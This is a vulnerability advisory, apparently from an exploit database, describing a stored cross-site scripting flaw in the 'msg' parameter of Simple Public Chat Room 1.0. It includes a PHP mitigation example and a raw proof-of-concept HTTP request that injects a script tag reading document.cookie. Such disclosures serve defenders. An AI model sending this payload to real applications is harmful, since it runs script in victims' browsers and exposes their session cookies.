vendor: Simple Public Chat Room
by: Richard Jones
CVSS: 8.8 HIGH
Stored Cross-Site Scripting
CWE: 79
Product Name: Simple Public Chat Room
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:simple_public_chat_room:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
2021

Simple Public Chat Room 1.0 – ‘msg’ Stored Cross-Site Scripting

A stored cross-site scripting vulnerability exists in Simple Public Chat Room 1.0: an attacker can inject JavaScript through the 'msg' parameter of the send_message.php page. The application stores the injected code and serves it to other users, so it executes in the context of each victim's browser when the page is loaded.

Mitigation:

Input validation should be used to prevent the injection of malicious code into the application.
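
An added example (not the application's code or the exploit author's) of this mitigation in PHP, the application's language: it validates 'msg' on input and, going beyond the validation named above, HTML-encodes the stored value on output, because free-form chat text cannot be reliably validated free of markup. The function names, the 500-byte limit and the div wrapper are assumptions.

```php
<?php
// Added example: hypothetical helpers, not taken from Simple Public Chat Room's source.
declare(strict_types=1);

const MAX_MSG_BYTES = 500; // assumed upper bound for one chat message

/** Validate a submitted 'msg' value; returns the cleaned text, or null to reject it. */
function validate_msg($raw): ?string
{
    if (!is_string($raw)) {                      // rejects array input such as msg[]=...
        return null;
    }
    if (!mb_check_encoding($raw, 'UTF-8')) {     // needs ext-mbstring; rejects malformed bytes
        return null;
    }
    // Remove C0 control characters and DEL, keeping tab and newline, then trim.
    $msg = trim(preg_replace('/[\x00-\x08\x0B-\x1F\x7F]/', '', $raw));
    if ($msg === '' || strlen($msg) > MAX_MSG_BYTES) {
        return null;
    }
    // Markup characters are kept on purpose: "<" and ">" are legitimate chat text.
    // They are made inert when rendered, not by filtering here.
    return $msg;
}

/** Encode a stored message for an HTML text node or a quoted attribute value. */
function render_msg(string $stored): string
{
    return htmlspecialchars($stored, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed demo input: the 'msg' value from the request on this page, URL-decoded.
$post = ['msg' => '<script>alert(document.cookie)</script>', 'id' => '1'];

$msg = validate_msg($post['msg'] ?? null);
if ($msg === null) {
    http_response_code(400);                     // reject instead of storing
} else {
    // In the application, $msg would be stored here through a prepared statement.
    // Every page that lists messages must pass the stored value through render_msg().
    echo '<div class="msg">' . render_msg($msg) . "</div>\n";
}
```

Encoding at render time also neutralises messages already stored before the fix, which input validation alone does not.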
Source

Exploit-DB raw data:

# Exploit Title: Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting
# Exploit Author: Richard Jones
# Date: 2021-01-26
# Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

#Replicates across chat sessions..


POST /chat/send_message.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 58
Origin: http://localhost
Connection: close
Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl

msg=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&id=1